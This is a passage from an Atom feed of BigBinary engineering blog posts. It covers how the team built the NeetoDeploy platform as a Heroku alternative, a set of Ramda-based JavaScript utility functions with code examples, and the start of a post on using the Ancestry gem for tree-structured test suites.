      <content type="html"><![CDATA[<p>This blog chronicles the exciting journey of how we built <a href="https://neeto.com/neetodeploy">NeetoDeploy</a>. It's a Heroku alternative. We started from absolute zero and built a fully functional PaaS product, with almost all the features that Heroku offers on their review apps, with a team of 4 developers in 2 months.</p><h2>How it all started</h2><p>At <a href="https://neeto.com">Neeto</a>, we are building <a href="https://blog.neeto.com/p/neeto-products-and-people">20+ products</a> simultaneously. All of these products had their production and staging environments hosted on Heroku. In addition, pull requests from these products had review apps deployed on Heroku. With an average of 5 open PRs at any time per product, we are talking about 100+ live review apps, 20+ staging apps, and 15+ production apps. Each one of these apps needed PostgreSQL, Redis, and ElasticSearch instances, besides other requirements.</p><p>In August 2022, Heroku made this <a href="https://blog.heroku.com/next-chapter">announcement</a>.</p><blockquote><p>&quot;Starting November 28, 2022, we plan to stop offering free product plans and plan to start shutting down free dynos and data services.&quot;</p></blockquote><p>It meant that in 2 months, our monthly Heroku bill would skyrocket. At first, we talked about switching to one of the Heroku alternatives.</p><blockquote><p>&quot;Every problem is an opportunity in disguise.&quot; - John Adams.</p></blockquote><p>And we thought - &quot;Why not build our own Heroku replacement?&quot;.</p><p><a href="https://bigbinary.com">BigBinary</a> has over 11 years of Ruby on Rails and React consulting expertise. However, building a Heroku replacement, a complex, DevOps-heavy project, was way out of our comfort zone. With faith in our engineering team and an exuberant spirit of youthful adventure, we embarked on a journey in early September 2022 to build <a href="https://neeto.com/neetodeploy">NeetoDeploy</a>.</p><h2>The Journey</h2><p>We put together a team of 4 developers. We discussed technologies ranging from Capistrano, Ansible, and AWS to Kubernetes. The more we talked, the more it became clear that no single technology could solve this problem. We needed a complex system with multiple independent components that would interact together to handle the following core responsibilities:</p><ol><li>GitHub integration.</li><li>A build system that would identify the application's run-time dependencies, install them in the correct order, and build runnable machine images.</li><li>A scalable containerized environment that can run the pre-built machine images.</li><li>A place to store the built machine images.</li><li>If the application needed a connection to external services (PostgreSQL, Redis, ElasticSearch, etc.), the ability to provision those at run-time.</li><li>A dashboard to view and manage the deployments.</li><li>Live logs.</li><li>Load balancing/routing.</li></ol><h2>The Architecture</h2><p>Once we understood the core functionality, we devised an architecture for the system. We then drew an architecture diagram depicting the different components and how they would interact with each other.</p><p><img src="/blog_images/2023/neeto-deploy-zero-to-one/neeto-deploy-arch.jpg" alt="NeetoDeploy - Architecture"></p><p>This diagram helped facilitate the rest of the discussions and our questions regarding the project's feasibility. We looked at the diagram and saw for the first time that we could break up this complex beast into manageable pieces that we could build, test, and deploy independently.</p><p>As per the plan, NeetoDeploy would comprise the following independent components:</p><ol><li>Slug Compiler</li><li>Dyno Manager</li><li>Add-on Manager</li><li>The Compute Cluster - with the router and load balancer</li><li>Web Dashboard</li></ol><h2>The Slug Compiler</h2><p>This component would bundle the application code, its run-time dependencies (Ruby, Node, Ruby gems, NPM packages, third-party tools like ffmpeg, etc.), and the operating system into a single image. We could then run this image on a container.</p><p>Using Docker to build the image was the first approach that we tried. After analyzing the problem, we understood that we needed to generate a Dockerfile on the fly. While working on this problem, we stumbled upon <a href="https://buildpacks.io/">Cloud Native Buildpacks</a>.</p><p>Their website said, &quot;transform your application source code into images that can run on any cloud&quot;. This is precisely what we needed.</p><p>The CNB (Cloud Native Buildpacks) system has three components:</p><ol><li>Stack</li><li>Builder</li><li>Buildpacks</li></ol><p>CNB provides the <a href="https://github.com/buildpacks/pack">pack utility</a>, which accepts a stack, a builder, and buildpacks as parameters and builds an OCI-compliant machine image that works with existing Docker tooling and any broader container ecosystem like Kubernetes. In addition, Heroku had open-sourced their older stacks and builders.</p><p>Now we had everything we needed to build runnable images.
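</p><p>For illustration, a <code>pack</code> invocation takes roughly the following shape; the image, builder, and buildpack names below are placeholders, not necessarily the exact ones we used:</p><pre><code class="language-bash"># Build an OCI image from the source code in the current directory.
pack build my-app-image \
  --path . \
  --builder heroku/builder:22 \
  --buildpack heroku/ruby</code></pre><p>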
But we needed theability to build multiple images in parallel since NeetoDeploy would havevarious projects, and each project could have numerous deployments (appcorresponding to the main branch for staging/production and review apps for eachcommit in a pull request).</p><p>We built the initial version of Slug Compiler as a Ruby on Rails application,exposing API endpoints to start and stop a build. It would need a GitHubrepository URL to fetch the source code, a list of buildpacks, and a callbackURL as inputs. Once the image is successfully built, it will make a POST requestto the callback URL.</p><p>The slug compiler would spin up an EC2 machine for each build request. We made acustom AMI from an Ubuntu image with <code>pack</code> and other packages required for theCNB build system to run. Once the <code>pack</code> command builds the image, it will pushit to our Dockerhub account (Docker registry) and return the image URL via acallback. It would then kill the EC2 instance.</p><p>We found uploading the image to <a href="https://hub.docker.com">Dockerhub</a> very slow.So we set up a private Docker registry on<a href="https://aws.amazon.com/ecs/">AWS ECS</a>.</p><h2>The Add-on Manager</h2><p>Applications typically need access to a database, search service, cache service,etc. The Neeto products use PostgreSQL, Redis, and ElasticSearch. We decided tobuild the first version of the add-on manager to support these add-ons.</p><p>We built the add-on infrastructure using three big<a href="https://aws.amazon.com/ec2/">AWS EC2</a> boxes to keep things simple. Each machineran a PG, Redis, and ElasticSearch server, respectively. We made the add-onmanager as a Ruby on Rails API server, which would accept the add-on type asinput and return a connection URI with login credentials included. 
We wouldsupport only a fixed version of the add-ons in the initial version.</p><p>Upon receiving the request for a PG add-on, we will create a new database on thePG server with a unique username/password and return the connection string. ForRedis and ElasticSearch, we simulated separate connections using namespaces.</p><p>This add-on manager had some severe drawbacks since multiple applications sharedthe same add-on servers running on the same physical machine. Two of the biggestdrawbacks had to do with Security and Resource choking.</p><ol><li>Security: With some effort, it was possible to tamper with the data of otherapplications.</li><li>Resource choking: If one application uses more CPU and Memory, it blocks allother applications.</li></ol><p>Nevertheless, this throw-away version of the add-on manager was a good start.</p><h2>The Dyno manager and the compute cluster</h2><p>We needed a secure, scalable, containerized environment to run our pre-builtimages. <a href="https://kubernetes.io">Kubernetes</a> was the obvious answer. Kubernetes,also known as K8s, is an open-source system for automating deployment, scaling,and managing containerized applications. We created our cluster on<a href="https://aws.amazon.com/eks/">AWS EKS</a>.</p><p>Dyno manager was once again a Ruby on Rails API server app, which takes apre-built OCI image URL and a callback URL as inputs. It would then interfacewith the Kubernetes cluster using the<a href="https://kubernetes.io/docs/reference/kubectl/">kubectl CLI</a> to deploy the imageon the cluster.</p><p>Our first cluster was of fixed size. It had four nodes (EC2 machines).Kubernetes would deploy images to these machines and manage them. But thefixed-size cluster soon proved inadequate as we had more parallel deploymentsthan could be accommodated. So we set up cluster autoscaling.</p><h2>Load balancing and routing</h2><p>All applications hosted on NeetoDeploy are made publicly available on a_.neetoreviewapp.com subdomain. 
A public IP address is needed to set up a <a href="https://www.cloudflare.com/en-gb/learning/dns/dns-records/dns-cname-record/">DNS CNAME record</a> for *.neetoreviewapp.com. We provisioned an <a href="https://aws.amazon.com/elasticloadbalancing/">Elastic Load Balancer</a>, an AWS component with a public IP address. ELB is the component of our system that acts as the interface to the outside world.</p><p>We now needed to route the incoming web requests to one of the deployed applications based on the subdomain, which required a programmable router. An <a href="https://docs.nginx.com/nginx-ingress-controller/">Nginx ingress controller</a> would meet this requirement. The Nginx ingress controller is essentially an Nginx server set up as a reverse proxy with the necessary redirect rules.</p><h2>The Web Dashboard</h2><p>NeetoDeploy needed an admin-facing web application that would perform the following functions:</p><ol><li>Admin user login.</li><li>Initiate GitHub account integration.</li><li>Select a repo and create a project.</li><li>View and manage the deployments for a project.</li><li>Interact with other components (Slug compiler, dyno manager, and add-on manager) to coordinate and orchestrate the functioning of the NeetoDeploy system.</li><li>Maintain state, like project-specific environment variables, add-on connection URLs, pre-built image URLs, etc.</li></ol><p>We built the Dashboard app using Ruby on Rails, React.js, <a href="https://blog.neeto.com/p/neetoui-is-the-ui-library-of-neeto">neetoUI</a>, and other integrations typical of any Neeto product.</p><h2>Live logging</h2><p>We needed to fetch and display two types of logs at run-time:</p><ul><li>Build and release logs.</li><li>Application logs.</li></ul><p>Fetching live logs from a remote machine and displaying them in the browser is a complicated problem.
We went with <a href="https://api.rubyonrails.org/classes/ActionController/Live/SSE.html">Server-Sent Events</a> (SSE) for the first version and streamed the logs directly to the browser.</p><ol><li>The dyno manager would tail <code>kubectl logs</code>.</li><li>STDOUT was continuously read and transmitted as server-sent events.</li><li>The dyno manager sent the <code>app-logs-url</code> to the dashboard app via a callback.</li><li>The Dashboard app had a log-display React component that streamed the SSE events using the <code>app-logs-url</code> and displayed the live logs.</li></ol><h2>How it all came together</h2><ol><li>The admin user signed up for a new account.</li><li>The admin logged in to the Dashboard app.</li><li>The admin connected their GitHub account.</li><li>The admin created a new project after selecting a GitHub repository.</li><li>The admin made a new pull request in the selected GitHub repository.</li><li>The dashboard app received the GitHub event for the new pull request creation.</li><li>The dashboard app requested the slug compiler to build an image for the repository using code corresponding to the pull request's latest commit.
It also sent the list of buildpacks to use.</li><li>The dashboard app also requested the add-on manager to create the necessary add-ons.</li><li>The dashboard app received the add-on URLs and saved them.</li><li>The slug compiler built the image, stored it on ECS, and made a callback to the dashboard app with the image URL, which the dashboard app saved.</li><li>The dashboard app requested the dyno manager to deploy and start the necessary web and worker processes, passing the image URL and add-on URLs as environment variables to set on the containers.</li><li>The Dyno manager talked to Kubernetes, completed the specified cluster deployments, and set up the necessary ingress rules.</li><li>The application became available for public access at https://xyz.neetoreviewapp.com.</li></ol><h2>Roadmap</h2><p>We improved all components to make them scalable, secure, and robust. We added features like a CLI, performance metrics, and continuous database backups; enabled caching; reduced build time; added horizontal scaling to support the increased load; made the platform extensible with custom buildpacks; stabilized live logging with <a href="https://fluentbit.io/">Fluentbit</a>; and more.</p><p>We migrated the review apps and staging environments of all <a href="https://neeto.com">neeto</a> products to NeetoDeploy. We also migrated the production instances of most of our static websites. We are now gearing up to migrate the production instances of all the Neeto products. Exciting features like custom plans for dynos, support for more add-on types, autoscaling to support unexpected surges in traffic, and more are in the pipeline.</p><p>In the coming weeks and months, we will be writing more about the challenges we faced and how we are building NeetoDeploy. Stay tuned for more.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without any change.
If you want to give NeetoDeploy a try, please send us an email at <a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to follow the journey, follow NeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join our <a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about any Neeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Extending pure utility functions of Ramda.js]]></title>
       <author><name>Neenu Chacko</name></author>
      <link href="https://www.bigbinary.com/blog/extending-pure-utility-functions-of-ramda"/>
      <updated>2023-05-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/extending-pure-utility-functions-of-ramda</id>
      <content type="html"><![CDATA[<h3>Introduction</h3><p>At BigBinary, we are always looking to improve our code. <a href="https://ramdajs.com/docs/">Ramda</a>'s focus on functional-style programming with immutable and side-effect-free functions aligns with this goal, making it our preferred choice.</p><p>While working on <a href="https://www.neeto.com/">neeto</a>, we found the need for specific functions that could be applied across a range of products but were not already included in Ramda. We extended Ramda's functions to meet this need and created our own pure utility functions.</p><p>In this blog, we'll explore our motivation for creating these functions and the benefits they provide, showcasing how they can be generally applicable to a wide range of products.</p><h3>The matches function: the core of our pure utility functions</h3><p>During the development of Neeto, we encountered instances where long conditional chains were used to search for objects with deeply nested properties.</p><p>For example, consider this <code>userOrder</code> object:</p><pre><code class="language-javascript">const userOrder = {
  id: 12356,
  user: {
    id: 2345,
    name: &quot;John Smith&quot;,
    role: &quot;customer&quot;,
    type: &quot;standard&quot;,
    email: &quot;john@example.com&quot;,
  },
  amount: 25000,
  type: &quot;prepaid&quot;,
  status: &quot;dispatched&quot;,
  shipTo: {
    name: &quot;Bob Brown&quot;,
    address: &quot;456 Oak Lane&quot;,
    city: &quot;Pretendville&quot;,
    state: &quot;Oregon&quot;,
    zip: &quot;98999&quot;,
  },
};</code></pre><p>We can check if this order is deliverable like this:</p><pre><code class="language-javascript">const isDeliverable =
  userOrder.type === &quot;prepaid&quot; &amp;&amp;
  userOrder.user.role === &quot;customer&quot; &amp;&amp;
  userOrder.status === &quot;dispatched&quot;;</code></pre><p>This approach works, but it can be simplified.</p><p>Our goal was to simplify the process by focusing on <strong>comparing all the keys of the pattern
to the corresponding keys in the data</strong>. If the pattern matches the object, the function should return true. With that in mind, we developed a function named <code>matches</code> to determine if a given object matches a specified pattern.</p><p>With <code>matches</code> we should be able to rewrite <code>isDeliverable</code> as:</p><pre><code class="language-javascript">const isDeliverable = matches(DELIVERABLE_ORDER_PATTERN, userOrder);</code></pre><p>Here the <code>DELIVERABLE_ORDER_PATTERN</code> is defined as:</p><pre><code class="language-javascript">const DELIVERABLE_ORDER_PATTERN = {
  type: &quot;prepaid&quot;,
  status: &quot;dispatched&quot;,
  user: { role: &quot;customer&quot; },
};</code></pre><p>This is how we implemented the <code>matches</code> function:</p><pre><code class="language-javascript">const matches = (pattern, object) =&gt; {
  if (object === pattern) return true;
  if (isNil(pattern) || isNil(object)) return false;
  if (typeof pattern !== &quot;object&quot;) return false;
  return Object.entries(pattern).every(([key, value]) =&gt;
    matches(value, object[key])
  );
};</code></pre><p>Here, we noticed a limitation in this implementation of the <code>matches</code> function: <strong>it compared the keys and values in the data and the pattern only for strict equality</strong>.
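</p><p>To make that behaviour concrete, here is a quick, self-contained check of this first version. This is only a sketch: the <code>isNil</code> below is a minimal stand-in so the snippet runs without importing Ramda.</p>

```javascript
// Minimal stand-in for Ramda's isNil (assumption: Ramda is not imported here).
const isNil = x => x === null || x === undefined;

// The first version of matches, which compares only for strict equality.
const matches = (pattern, object) => {
  if (object === pattern) return true;
  if (isNil(pattern) || isNil(object)) return false;
  if (typeof pattern !== "object") return false;
  return Object.entries(pattern).every(([key, value]) =>
    matches(value, object[key])
  );
};

const userOrder = {
  type: "prepaid",
  status: "dispatched",
  user: { role: "customer" },
};

console.log(matches({ type: "prepaid", user: { role: "customer" } }, userOrder)); // true
console.log(matches({ status: "delivered" }, userOrder)); // false
```

<p>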
We were not able to use the <code>matches</code> function for a situation like the one mentioned below.</p><p>To check if the <code>userOrder</code> is being shipped to the state of <code>Michigan</code> or <code>Oregon</code>, we were not able to call the <code>matches</code> function on the key <code>state</code>. Instead, we had to use the following approach along with other conditions.</p><pre><code class="language-javascript">const isToBeShippedToMichiganOrOregon =
  [&quot;Michigan&quot;, &quot;Oregon&quot;].includes(userOrder.shipTo.state) &amp;&amp;
  // other long chain of conditions</code></pre><p>To cover that, we decided to <strong>allow functions as key values in the pattern object</strong>. With this change, we should be able to write the same check as follows.</p><pre><code class="language-javascript">matches(
  {
    shipTo: { state: state =&gt; [&quot;Michigan&quot;, &quot;Oregon&quot;].includes(state) },
    // ...other properties
  },
  userOrder
);</code></pre><p>Here is the modification we made to the <code>matches</code> function to accomplish this feature:</p><pre><code class="language-javascript">const matches = (pattern, object) =&gt; {
  if (object === pattern) return true;
  if (typeof pattern === &quot;function&quot; &amp;&amp; pattern(object)) return true;
  if (isNil(pattern) || isNil(object)) return false;
  if (typeof pattern !== &quot;object&quot;) return false;
  return Object.entries(pattern).every(([key, value]) =&gt;
    matches(value, object[key])
  );
};</code></pre><p>As a result of these improvements, the <code>matches</code> function can now handle a wider range of patterns.</p><pre><code class="language-javascript">const user = {
  firstName: &quot;Oliver&quot;,
  address: { city: &quot;Miami&quot;, phoneNumber: &quot;389791382&quot; },
  cars: [{ brand: &quot;Ford&quot; }, { brand: &quot;Honda&quot; }],
};

matches({ cars: includes({ brand: &quot;Ford&quot; }) }, user); // true
matches({ firstName: startsWith(&quot;O&quot;) }, user); // true</code></pre><p>Here, both <a href="https://ramdajs.com/docs/#includes">includes</a> and <a href="https://ramdajs.com/docs/#startsWith">startsWith</a> are methods from Ramda, and they are both curried functions. We will be talking about <code>currying</code> of functions in the upcoming section.</p><h2>Neeto's pure utility functions for array operations</h2><p>With the help of the <code>matches</code> function, it became easier for us to work on our next task at hand: building utility functions that simplify array operations.</p><h3>*By functions</h3><p>Let's say we have an array of users:</p><pre><code class="language-javascript">const users = [
  {
    id: 1,
    name: &quot;Sam&quot;,
    age: 20,
    address: {
      street: &quot;First street&quot;,
      pin: 123456,
      contact: {
        phone: &quot;123-456-7890&quot;,
        email: &quot;sam@example.com&quot;,
      },
    },
  },
  {
    id: 2,
    name: &quot;Oliver&quot;,
    age: 40,
    address: {
      street: &quot;Second street&quot;,
      pin: 654321,
      contact: {
        phone: &quot;987-654-3210&quot;,
        email: &quot;oliver@example.com&quot;,
      },
    },
  },
];</code></pre><p>If we need to retrieve the details of the user with the name <code>Sam</code>, we will do it like this in plain vanilla JS:</p><pre><code class="language-javascript">const sam = users.find(user =&gt; user.name === &quot;Sam&quot;);</code></pre><p>Since we already have the <code>matches</code> function, we could easily create a utility function that would return the same result as above while removing extra code.</p><p>That's how we came up with the <code>findBy</code> function, which can be used to find the first item that matches the given pattern from an array.</p><p>We defined <code>findBy</code> like this:</p><pre><code class="language-javascript">const findBy = (pattern, array) =&gt; array.find(item =&gt; matches(pattern, item));</code></pre><p>Now we were able to rewrite our previous array operation as:</p><pre><code 
class="language-javascript">const sam = findBy({ name: &quot;Sam&quot; }, users);</code></pre><p>It was also now possible for us to write nested conditions like these:</p><pre><code class="language-javascript">findBy({ age: 40, address: { pin: 654321 } }, users);
// returns details of the first user with age 40 whose pin is 654321

findBy({ address: { contact: { email: &quot;sam@example.com&quot; } } }, users);
// returns details of the first user whose contact email is &quot;sam@example.com&quot;</code></pre><p>We adopted the concept of <a href="https://javascript.info/currying-partials"><strong>currying</strong></a> from Ramda to shorten our function definitions and their usage.</p><p>Currying is a technique in functional programming where a function that takes multiple arguments is transformed into a sequence of functions, each taking a single argument. Simply said, currying translates a function callable as <code>f(a, b, c)</code> into one callable as <code>f(a)(b)(c)</code>. You can learn more about currying and Ramda from our free <a href="https://courses.bigbinaryacademy.com/learn-ramdajs/introduction/currying">Learn RamdaJS book</a>.</p><p>We wrapped the definition of <code>matches</code> inside the <a href="https://ramdajs.com/docs/#curry">curry</a> function from Ramda as shown below:</p><pre><code class="language-javascript">const matches = curry((pattern, object) =&gt; {
  // ...matches function logic
});</code></pre><p>With this update, the <code>findBy</code> function could be simplified to:</p><pre><code class="language-javascript">const findBy = (pattern, array) =&gt; array.find(matches(pattern));</code></pre><p>We also wrapped the <code>findBy</code> function in <code>curry</code> for the same reason:</p><pre><code class="language-javascript">const findBy = curry((pattern, array) =&gt; array.find(matches(pattern)));</code></pre><p>Similar to <code>findBy</code>, we also introduced the following functions to simplify development:</p><ul><li><strong><code>findIndexBy(pattern, data):</code></strong> finds the index of the first occurrence of an item that matches the pattern in the given array.</li><li><strong><code>filterBy(pattern, data):</code></strong> returns the filtered array of items based on pattern matching.</li><li><strong><code>findLastBy(pattern, data):</code></strong> finds the last item that matches the given pattern.</li><li><strong><code>removeBy(pattern, data):</code></strong> removes all items that match the given pattern from an array of items.</li><li><strong><code>countBy(pattern, data):</code></strong> returns the number of items that match the given pattern.</li><li><strong><code>replaceBy(pattern, newItem, data):</code></strong> replaces all items that match the given pattern with the given item.</li></ul><p>Here are some example usages of these functions:</p><pre><code class="language-javascript">findIndexBy({ name: &quot;Sam&quot; }, users);
// returns the array index of Sam in &quot;users&quot;

filterBy({ address: { street: &quot;First street&quot; } }, users);
// returns a list of &quot;users&quot; who live on First street

removeBy({ name: &quot;Sam&quot; }, users); // removes Sam from &quot;users&quot;

countBy({ age: 20 }, users);
// returns the count of &quot;users&quot; who are exactly 20 years old

findLastBy({ name: includes(&quot;e&quot;) }, users);
// returns the last user whose name contains the character 'e'

const newItem = { id: 2, name: &quot;John&quot; };
replaceBy({ name: &quot;Sam&quot; }, newItem, users);
/*
[
  { id: 2, name: &quot;John&quot; },
  { id: 2, name: &quot;Oliver&quot;, age: 40, ...Oliver's address attributes },
];
*/</code></pre><h3>*ById functions</h3><p>Applications frequently rely on unique IDs for data retrieval.
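</p><p>The pieces above can be exercised end to end. The following is a self-contained sketch (not our production code): <code>curry</code> and <code>isNil</code> are minimal stand-ins so it runs without Ramda, while <code>matches</code> and <code>findBy</code> are the definitions from this post.</p>

```javascript
// Minimal stand-ins for Ramda's isNil and curry (assumptions, not Ramda itself).
const isNil = x => x === null || x === undefined;
const curry = fn => (...args) =>
  args.length >= fn.length ? fn(...args) : curry(fn.bind(null, ...args));

// matches and findBy as defined in this post.
const matches = curry((pattern, object) => {
  if (object === pattern) return true;
  if (typeof pattern === "function" && pattern(object)) return true;
  if (isNil(pattern) || isNil(object)) return false;
  if (typeof pattern !== "object") return false;
  return Object.entries(pattern).every(([key, value]) =>
    matches(value, object[key])
  );
});

const findBy = curry((pattern, array) => array.find(matches(pattern)));

const users = [
  { id: 1, name: "Sam", age: 20 },
  { id: 2, name: "Oliver", age: 40 },
];

// Thanks to currying, findBy can be partially applied:
const findSam = findBy({ name: "Sam" });
console.log(findSam(users)); // { id: 1, name: 'Sam', age: 20 }
```

<p>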
As a result, when using <strong><code>By</code></strong> functions, pattern matching on the ID becomes necessary.</p><pre><code class="language-javascript">const defaultUser = findBy({ id: DEFAULT_USER_ID }, users);</code></pre><p>To shorten this code, we developed a set of utility functions that can be invoked directly based on the ID. Let us call them <code>ById</code> functions. With <code>ById</code> functions, we can rewrite the previous code as:</p><pre><code class="language-javascript">const defaultUser = findById(DEFAULT_USER_ID, users);</code></pre><p>Here are some of the <code>ById</code> functions we use:</p><ul><li><strong><code>findById(id, data):</code></strong> finds an object having the given <code>id</code> from an array.</li><li><strong><code>replaceById(id, newItem, data):</code></strong> returns a new array with the item having the given <code>id</code> replaced with the given object.</li><li><strong><code>modifyById(id, modifier, data):</code></strong> applies a modifier function to the item in an array that matches the given <code>id</code>.
It then returns a new array where the return value of the modifier function is placed at the index of the matching item.</li><li><strong><code>findIndexById(id, data):</code></strong> finds the index of an item from an array of items based on the <code>id</code> provided.</li><li><strong><code>removeById(id, data):</code></strong> returns a new array where the item with the given <code>id</code> is removed.</li></ul><p>Here are a few examples:</p><pre><code class="language-javascript">findById(2, users); // returns the object with id=2 from &quot;users&quot;

const idOfItemToBeReplaced = 2;
const newItem = { id: 3, name: &quot;John&quot; };
replaceById(idOfItemToBeReplaced, newItem, users);
// [{ id: 1, name: &quot;Sam&quot;, age: 20, ... }, { id: 3, name: &quot;John&quot; }]

const idOfItemToBeModified = 2;
const modifier = item =&gt; assoc(&quot;name&quot;, item.name.toUpperCase(), item);
modifyById(idOfItemToBeModified, modifier, users);
// [{ id: 1, name: &quot;Sam&quot;, ... }, { id: 2, name: &quot;OLIVER&quot;, ... }]

const idOfItemToBeRemoved = 2;
removeById(idOfItemToBeRemoved, users);
// [{ id: 1, name: &quot;Sam&quot;, ... }]</code></pre><p><a href="https://courses.bigbinaryacademy.com/learn-ramdajs/association-methods/assoc"><strong>assoc</strong></a> is a function from Ramda that makes a shallow clone of an object, setting or overriding the specified property with the given value.</p><h2>Null-safe alternatives for pure functions</h2><p>The <code>By</code> and <code>ById</code> functions proved invaluable in improving the code quality. However, when working with data in web applications, it is quite common to come across scenarios where the data being processed can be <code>null/undefined</code>.
The above-mentioned implementations of the <code>By</code> and <code>ById</code> functions will fail with an error if the <code>users</code> array passed into them is <code>null/undefined</code>.</p><p>In such a case, to use the <code>filterBy</code> function, we need to adopt a method like this:</p><pre><code class="language-javascript">users &amp;&amp; filterBy({ age: 20 }, users);</code></pre><p>So we needed a fail-safe alternative that could be used in places where the data array can be <code>null/undefined</code>. This null-safe alternative should avoid execution and return <code>users</code> if <code>users</code> is <code>null/undefined</code>. It should work the same as <code>filterBy</code> otherwise.</p><p>Hence we created a <strong>wrapper function that would check the data for nullity and execute the child function conditionally</strong>. This is how we did it:</p><pre><code class="language-javascript">const nullSafe =
  func =&gt;
  (...args) =&gt; {
    const dataArg = args[func.length - 1];
    return isNil(dataArg) ? dataArg : func(...args);
  };</code></pre><p>With the help of this <code>nullSafe</code> function, we created null-safe alternatives for all our pure functions.</p><pre><code class="language-javascript">const _replaceById = nullSafe(replaceById);
const _modifyById = nullSafe(modifyById);</code></pre><p>But with the <code>nullSafe</code> wrapping, currying ceased to work for these null-safe alternatives. To retain currying, we had to rewrite <code>nullSafe</code> using the <a href="https://ramdajs.com/docs/#curryN">curryN</a> function from Ramda like this:</p><pre><code class="language-javascript">const nullSafe = func =&gt;
  curryN(func.length, (...args) =&gt; {
    const dataArg = args[func.length - 1];
    return isNil(dataArg) ? dataArg : func(...args);
  });</code></pre><h2>Some other useful functions</h2><h3>keysToCamelCase</h3><p>Recursively converts snake-cased object keys to camel case.</p><pre><code class="language-javascript">const snakeToCamelCase = string =&gt;
  string.replace(/(_\w)/g, letter =&gt; letter[1].toUpperCase());

const keysToCamelCase = obj =&gt;
  Object.fromEntries(
    Object.entries(obj).map(([key, value]) =&gt; [
      snakeToCamelCase(key),
      typeof value === &quot;object&quot; &amp;&amp; value !== null &amp;&amp; !Array.isArray(value)
        ? keysToCamelCase(value)
        : value,
    ])
  );

keysToCamelCase({
  first_name: &quot;Oliver&quot;,
  last_name: &quot;Smith&quot;,
  address: { city: &quot;Miami&quot;, phone_number: &quot;389791382&quot; },
});
/*
{
  firstName: &quot;Oliver&quot;,
  lastName: &quot;Smith&quot;,
  address: { city: &quot;Miami&quot;, phoneNumber: &quot;389791382&quot; },
}
*/</code></pre><h3>isNot</h3><p>Returns <code>true</code> if the given values (or references) are not equal, <code>false</code> otherwise.</p><pre><code class="language-javascript">const isNot = curry((x, y) =&gt; x !== y);</code></pre><p>Say you have a task at hand: finding details about users, but specifically excluding the user named &quot;Sam&quot;. In such a scenario, you can retrieve the information as shown below:</p><pre><code class="language-javascript">filterBy({ name: name =&gt; name !== &quot;Sam&quot; }, users);</code></pre><p>But this could be made more readable and concise if we had a function that finds the non-identical matches from the <code>users</code> list. For this, you can use the <code>isNot</code> function.</p><pre><code class="language-javascript">filterBy({ name: isNot(&quot;Sam&quot;) }, users);
// returns an array of all users except &quot;Sam&quot;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Improving the application performance by harnessing the full potential of ancestry gem]]></title>
       <author><name>Shemin Anto</name></author>
      <link href="https://www.bigbinary.com/blog/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem"/>
      <updated>2023-05-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem</id>
      <content type="html"><![CDATA[<p><a href="https://www.neeto.com/neetotestify">NeetoTestify</a> is a test management platform for manual and automated QA testing. It allows us to organize test cases into logical groups called test suites. A single suite can contain multiple test cases and multiple suites. The image below shows how the suites are displayed in the UI in a hierarchical order. The arrangement in which the suites are displayed resembles a tree data structure.</p><p><img src="/blog_images/2023/how-neetoTestify-improved-test-suites-performance-utilizing-ancestry-gem/neetoTestify-test-cases-page.png" alt="Suites displayed with their hierarchical structure in NeetoTestify"></p><p>To display test suites in a tree structure, we need to store some information about the parent-child relationship in the database. This is where <a href="https://github.com/stefankroes/ancestry">Ancestry</a> comes in. Ancestry is a gem that allows Rails Active Record models to be organized as a tree structure.</p><p>Normally, web applications implement pagination to show a list of records. But implementing pagination for tree-structured data can be challenging and can make the application more complex. To avoid pagination, the application must be performant enough to display an entire tree with a large number of nodes/records without significant delays.</p><p>In this blog, we will discuss how we leveraged the full potential of the Ancestry gem to address the performance issues encountered while listing suites.</p><h3>1. Migration to materialized_path2</h3><p>There are several ways to store hierarchical data in a relational database, such as materialized paths, closure tree tables, adjacency lists, and nested sets. The Ancestry gem uses the materialized path pattern to store hierarchical data.</p><p>The materialized path pattern is a technique in which a single node is stored in the database as a record, with an additional column to store the hierarchical information.
In the case of the Ancestry gem, this additional column is named <code>ancestry</code>. The <code>ancestry</code> column is used to store the IDs of the ancestors of a node as a single string, separated by a delimiter.</p><p>In order to understand how the Ancestry gem uses the materialized path pattern, first let's look at the nodes we have in our example. In the screenshot posted above, we see the following four nodes:</p><table><thead><tr><th>Test suite name</th><th>Node ID</th></tr></thead><tbody><tr><td>Suite 1</td><td>s1</td></tr><tr><td>Suite 1.1</td><td>s11</td></tr><tr><td>Suite 1.1.1</td><td>s111</td></tr><tr><td>Suite 1.2</td><td>s12</td></tr></tbody></table><p>In our example, s1 is the root node, s11 and s12 are the children of node s1, and s111 is the child of s11.</p><p>In order to store the hierarchical data, the gem offers two types of ancestry formats, <code>materialized_path</code> and <code>materialized_path2</code>. In both techniques, each node is represented by a record in the database. Our example consists of four nodes, so there will be four records in the database. The only difference between <code>materialized_path</code> and <code>materialized_path2</code> lies in the format in which the IDs are stored in the <code>ancestry</code> column.</p><h4>materialized_path</h4><p>Here the IDs of ancestors are stored in the format &quot;id-1/id-2/id-3&quot;, where <code>id-1</code>, <code>id-2</code> and <code>id-3</code> are the IDs of three nodes with <code>/</code> as the delimiter. <code>id-1</code> is the root node, <code>id-2</code> is the child of <code>id-1</code> and <code>id-3</code> is the child of <code>id-2</code>.
